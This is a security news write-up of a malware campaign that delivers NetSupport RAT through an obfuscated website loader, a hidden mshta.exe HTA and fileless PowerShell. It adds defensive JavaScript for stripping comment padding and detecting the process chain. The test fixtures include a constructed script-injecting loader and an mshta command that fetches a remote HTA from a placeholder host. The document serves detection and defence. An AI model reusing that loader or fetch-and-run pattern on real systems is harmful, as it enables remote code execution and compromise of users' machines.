A new malware campaign has been uncovered targeting enterprise users through compromised websites, employing a multi-stage attack chain designed to bypass modern security defenses. Dubbed “JS#SMUGGLER” by the Securonix Threat Research team, the operation leverages heavily obfuscated JavaScript and Living-off-the-Land binaries (LOLBins), legitimate signed Windows executables repurposed by the attacker, to silently install the notorious NetSupport RAT.
The attack is notable for its stealth and adaptability. According to the analysis, “The attack chain unfolds across three distinct stages: (1) an obfuscated JavaScript loader injected into a compromised website, (2) a stealthy HTA (HTML Application) that executes encrypted PowerShell stagers via mshta.exe, and (3) a final PowerShell payload that downloads, extracts, executes, and establishes persistence for a Windows-based remote access Trojan”.
Stage 1: The “Junk Code” Camouflage
The infection begins when a victim visits a compromised website containing a malicious script injection. To evade detection, the attackers use an unusual obfuscation technique. “Instead of relying solely on compacted or encrypted code, the attackers flooded the script with massive comment blocks filled with randomly generated words, inserting them between nearly every line of functional JavaScript”.
This flood of “junk text” bloats the file into thousands of lines of noise, helping it slip past automated scanners tuned to flag the compact, densely packed scripts that malicious injections usually look like. Because comments are discarded by the JavaScript engine, the functional code is unchanged; only the analyst and the scanner have to wade through the padding.
Once loaded, the script acts as a traffic director. It fingerprints the victim’s device, checking whether the visitor is on a mobile or desktop device.
- Mobile Users: Redirected via a fullscreen iframe to a different malicious URL.
- Desktop Users: Targeted for the next stage of the infection via a dynamically generated script tag.
Crucially, the loader implements a “first-visit” check using the browser’s localStorage. “The loader also implements a subtle first-visit tracking mechanism… to ensure the malicious logic executes only once per user, reducing noise and increasing stealth”.
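The comment-padding technique described in Stage 1 is cheap to reverse once you stop treating the file as text and treat it as tokens. The following is an added example, not code from the Securonix write-up: a Node.js triage helper that strips block and line comments while leaving string and template literals intact (so a `/*` inside a URL string survives), then reports what fraction of the file was padding. The functional loader lines, the placeholder URL, the junk-word generator and the 0.8 / 50-line thresholds are all constructed for this example, not indicators from the campaign.

```javascript
// Added example, not code from the Securonix write-up: triage helper for
// comment-padded JavaScript loaders like the Stage 1 sample described above.
// Limitation (acceptable for triage): regex literals such as /\/\*/ are not
// recognised, so a "/*" inside a regex would be treated as a comment start.
function stripComments(src) {
  let out = "";
  let i = 0;
  const n = src.length;
  while (i < n) {
    const c = src[i];
    const next = src[i + 1];
    // String or template literal: copy verbatim, honouring backslash escapes,
    // so "//" or "/*" inside a URL string is never mistaken for a comment.
    if (c === '"' || c === "'" || c === "`") {
      out += c;
      i++;
      while (i < n && src[i] !== c) {
        if (src[i] === "\\" && i + 1 < n) {
          out += src[i] + src[i + 1];
          i += 2;
        } else {
          out += src[i++];
        }
      }
      if (i < n) out += src[i++]; // closing quote
      continue;
    }
    // Block comment: drop through the closing "*/" (or to EOF if unterminated).
    if (c === "/" && next === "*") {
      const end = src.indexOf("*/", i + 2);
      i = end === -1 ? n : end + 2;
      out += " "; // keep tokens apart: a/**/b must not become ab
      continue;
    }
    // Line comment: drop up to, but not including, the newline.
    if (c === "/" && next === "/") {
      const end = src.indexOf("\n", i + 2);
      i = end === -1 ? n : end;
      continue;
    }
    out += c;
    i++;
  }
  return out;
}

// Report how much of the file was comment padding. The 0.8 ratio and 50-line
// floor are assumptions for this example, not thresholds from the write-up.
function commentPaddingReport(src) {
  const stripped = stripComments(src);
  const codeLines = stripped.split("\n").filter((l) => l.trim() !== "").length;
  const totalLines = src.split("\n").length;
  const paddingRatio = src.length === 0 ? 0 : 1 - stripped.length / src.length;
  return { totalLines, codeLines, paddingRatio, suspicious: paddingRatio > 0.8 && totalLines > 50 };
}

// Deterministic junk words (tiny LCG) so the constructed sample is reproducible.
function makeJunkBlock(seed, wordCount) {
  let x = seed >>> 0;
  const words = [];
  for (let k = 0; k < wordCount; k++) {
    x = (Math.imul(1103515245, x) + 12345) >>> 0;
    let w = "";
    const len = 4 + (x % 6);
    for (let j = 0; j < len; j++) {
      x = (Math.imul(1103515245, x) + 12345) >>> 0;
      w += String.fromCharCode(97 + (x % 26));
    }
    words.push(k % 8 === 7 ? w + "\n" : w); // wrap every eight words
  }
  return "/* " + words.join(" ") + " */";
}

// Constructed stand-in for the functional part of such a loader (device check,
// first-visit flag, dynamic script tag); the URL is a placeholder, not an IOC.
const FUNCTIONAL_LINES = [
  "var mobile = /Android|iPhone|iPad/i.test(navigator.userAgent);",
  'if (!localStorage.getItem("seen")) {',
  '  localStorage.setItem("seen", "1");',
  '  var s = document.createElement("script");',
  '  s.src = "https://cdn.example.invalid/next.js";',
  "  document.head.appendChild(s);",
  "}",
];

function buildPaddedSample(lines, wordsPerBlock) {
  return lines.map((line, idx) => makeJunkBlock(idx + 1, wordsPerBlock) + "\n" + line).join("\n");
}

const PADDED_SAMPLE = buildPaddedSample(FUNCTIONAL_LINES, 400);
const BENIGN_SAMPLE = 'var u = "http://x/*not a comment*/y"; // real comment\n' + FUNCTIONAL_LINES.join("\n");

console.log(commentPaddingReport(PADDED_SAMPLE)); // paddingRatio above 0.9, suspicious: true
console.log(commentPaddingReport(BENIGN_SAMPLE)); // suspicious: false
```

Run the stripped output through a formatter and the seven functional lines are all that remain; the ratio alone is a useful first-pass signal for any script injected into a site you monitor, since legitimate minified bundles sit near zero.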
Stage 2: The Silent HTA Loader
If the victim is on a desktop, the next stage is a malicious HTML Application (HTA) file, executed by mshta.exe, a signed Windows utility that renders HTA content with the full privileges of the logged-on user, outside the browser’s sandbox, which is why it is a favourite LOLBin. The write-up does not detail how control passes from the web page to mshta.exe; a browser will not launch it on its own, so some user interaction is implied, consistent with Securonix’s warning about web-based social engineering.
The HTA is engineered to be invisible. It configures itself with settings like border="none", showintaskbar="no", and windowstate="minimize" to ensure it “runs completely hidden from the user”.
Inside this hidden window, the HTA unwraps an embedded PowerShell payload in layers: “AES-256-ECB decoding, Base64 extraction, and GZIP decompression”. The resulting PowerShell is then executed directly in memory rather than written to disk, the pattern commonly called “fileless” execution. Two caveats for defenders: the decryption key has to be available to the HTA, so an analyst holding the HTA can recover the stage, meaning the AES layer is obfuscation rather than protection; and “fileless” applies to this stager only, since the HTA itself is fetched as a file and the final RAT is written to disk (see Stage 3).
“This technique is a hallmark of modern fileless malware: it allows attackers to run sophisticated logic entirely in memory, bypassing antivirus engines and EDR tools that rely on scanning files written to disk”.
Stage 3: NetSupport RAT Deployment
The final stage delivers the ultimate payload: NetSupport RAT. While NetSupport Manager is a legitimate remote administration tool, it is frequently repurposed by cybercriminals to gain unauthorized access to victim machines.
“NetSupport RAT enables full attacker control over the victim host, including remote desktop access, file operations, command execution, data theft, and proxy capabilities”.
The installer downloads a ZIP archive of the RAT components from attacker-controlled infrastructure and unpacks them into a benign-looking directory, C:\ProgramData\CommunicationLayer. To survive a reboot, the script creates a deceptively named shortcut, “WindowsUpdate.lnk”, in the Windows Startup folder, so the RAT is relaunched at every logon.
The JS#SMUGGLER campaign shows how far web-based malware delivery has evolved. By combining heavy JavaScript obfuscation, in-memory PowerShell execution, and a legitimate remote-administration tool as the final payload, the attackers have built an infection chain in which each stage is designed to slip past a different class of control.
Securonix advises organizations to “stay alert for web-based social engineering techniques” and to deploy Endpoint Detection and Response (EDR) solutions capable of detecting “suspicious script activity, HTA/mshta.exe abuse, fileless PowerShell execution, and anomalous parent-child process chains”.
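The host-side artifacts described above (mshta.exe fetching a remote HTA, mshta.exe spawning PowerShell, files landing under C:\ProgramData\CommunicationLayer, and a .lnk appearing in the Startup folder) are straightforward to turn into detections. The following is an added example, not code from the Securonix write-up: rule logic run over constructed Sysmon-style process-creation and file-creation events, with a correlation step that ties the findings to a single PowerShell process. The PIDs, image paths, placeholder URL and dropped file name are made up for the example; the drop directory and the WindowsUpdate.lnk name are the ones reported in the article.

```javascript
// Added example, not code from the Securonix write-up: detections for the
// mshta.exe -> PowerShell -> ProgramData drop -> Startup .lnk chain, evaluated
// over constructed Sysmon-style events.
function baseName(p) {
  return p.split("\\").pop().toLowerCase();
}

function detect(events) {
  const findings = [];
  for (const e of events) {
    if (e.type === "process") {
      const image = baseName(e.image);
      const parent = baseName(e.parentImage);
      // mshta.exe pulling its HTA from a URL rather than a local file.
      if (image === "mshta.exe" && /https?:\/\//i.test(e.commandLine)) {
        findings.push({ rule: "mshta_remote_hta", pid: e.pid });
      }
      // The Stage 2 parent-child chain: HTA host spawning PowerShell.
      if (image === "powershell.exe" && parent === "mshta.exe") {
        findings.push({ rule: "mshta_spawns_powershell", pid: e.pid });
      }
    } else if (e.type === "file") {
      const path = e.targetPath.toLowerCase();
      // Stage 3 drop directory reported in the write-up.
      if (path.startsWith("c:\\programdata\\communicationlayer\\")) {
        findings.push({ rule: "communicationlayer_drop", pid: e.pid });
      }
      // Any .lnk written to a Startup folder is persistence; the name match is a bonus.
      if (path.includes("\\start menu\\programs\\startup\\") && path.endsWith(".lnk")) {
        findings.push({
          rule: path.endsWith("\\windowsupdate.lnk") ? "startup_lnk_windowsupdate" : "startup_lnk_persistence",
          pid: e.pid,
        });
      }
    }
  }
  return findings;
}

// True when one PowerShell process spawned by mshta.exe is also the writer of
// both the drop directory and the Startup shortcut.
function chainComplete(findings) {
  const psPids = new Set(findings.filter((f) => f.rule === "mshta_spawns_powershell").map((f) => f.pid));
  return [...psPids].some(
    (pid) =>
      findings.some((f) => f.rule === "communicationlayer_drop" && f.pid === pid) &&
      findings.some((f) => f.rule.startsWith("startup_lnk") && f.pid === pid)
  );
}

// Constructed events; PIDs, paths and the URL are placeholders.
const PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
const MALICIOUS_EVENTS = [
  { type: "process", pid: 4120, image: "C:\\Windows\\System32\\mshta.exe",
    parentImage: "C:\\Windows\\explorer.exe", commandLine: "mshta.exe https://cdn.example.invalid/update.hta" },
  { type: "process", pid: 4188, image: PS_IMAGE,
    parentImage: "C:\\Windows\\System32\\mshta.exe", commandLine: "powershell.exe" },
  { type: "file", pid: 4188, image: PS_IMAGE,
    targetPath: "C:\\ProgramData\\CommunicationLayer\\dropped.exe" },
  { type: "file", pid: 4188, image: PS_IMAGE,
    targetPath: "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.lnk" },
];
const BENIGN_EVENTS = [
  { type: "process", pid: 900, image: PS_IMAGE, parentImage: "C:\\Windows\\explorer.exe", commandLine: "powershell.exe" },
  { type: "file", pid: 900, image: PS_IMAGE, targetPath: "C:\\Users\\alice\\Documents\\report.txt" },
  { type: "process", pid: 950, image: "C:\\Windows\\System32\\mshta.exe",
    parentImage: "C:\\Windows\\explorer.exe", commandLine: "mshta.exe C:\\Tools\\localdash.hta" },
];

console.log(detect(MALICIOUS_EVENTS), chainComplete(detect(MALICIOUS_EVENTS))); // four findings, true
console.log(detect(BENIGN_EVENTS)); // []
```

Each rule fires on its own in an EDR or SIEM, but the correlation is what lifts the alert above the noise of the occasional legitimate HTA: a single process lineage that touches all four artifacts is the campaign, not an admin script.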